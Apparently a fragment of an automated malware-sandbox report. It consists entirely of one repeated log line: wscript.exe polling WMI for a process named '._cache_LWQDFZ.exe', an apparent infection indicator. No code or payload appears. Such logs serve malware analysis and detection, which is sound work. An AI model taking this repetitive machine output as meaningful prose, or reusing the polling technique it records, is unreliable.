                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
